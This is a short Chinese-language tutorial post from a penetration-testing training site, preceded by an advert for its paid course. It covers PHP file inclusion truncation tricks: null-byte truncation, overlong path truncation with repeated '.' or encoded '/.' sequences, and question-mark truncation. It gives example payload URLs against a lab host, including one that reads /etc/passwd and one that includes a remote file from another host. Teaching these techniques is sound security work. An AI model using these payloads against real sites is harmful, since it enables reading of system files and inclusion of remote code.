【原创】WEB安全第五章 漏洞学习与利用06文件包含截断
【推荐学习】暗月渗透测试培训 十多年渗透经验,体系化培训渗透测试 、高效学习渗透测试,欢迎添加微信好友aptimeok 咨询。
WEB安全第五章 漏洞学习与利用06文件包含截断
1、00截断法
00字符截断(php<5.3.4)
(需要 magic_quotes_gpc=off)
/etc/passwd
/etc/passwd%00
http://include.moonteam.com/file02.php?file=x.jpg%00

00字符截断(php<5.3.4)
(需要 magic_quotes_gpc=off)
/etc/passwd
/etc/passwd%00
http://include.moonteam.com/file02.php?file=x.jpg%00
2、超长文件截断
(php版本小于5.2.8 可以成功,linux需要文件名长于4096,windows需要长于256)
利用操作系统对目录最大长度限制。
在window下256字节
linux下4096字节
截断的字符有
.
http://include.moonteam.com/file02.php?file=x.jpg………………………………………………………………………………………………………………………………………………………………………………………………………………

/.
http://include.moonteam.com/file02.php?file=x.jpg%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e

3、问号截断
适用于远程截断。
php>=5.3
allow_url_fopen On On
allow_url_include On
http://www.webtester.com/include/file02.php?file=http://192.168.0.121/x.txt?

原创文章,作者:mOon,如若转载,请注明出处:https://www.moonsec.com/262.html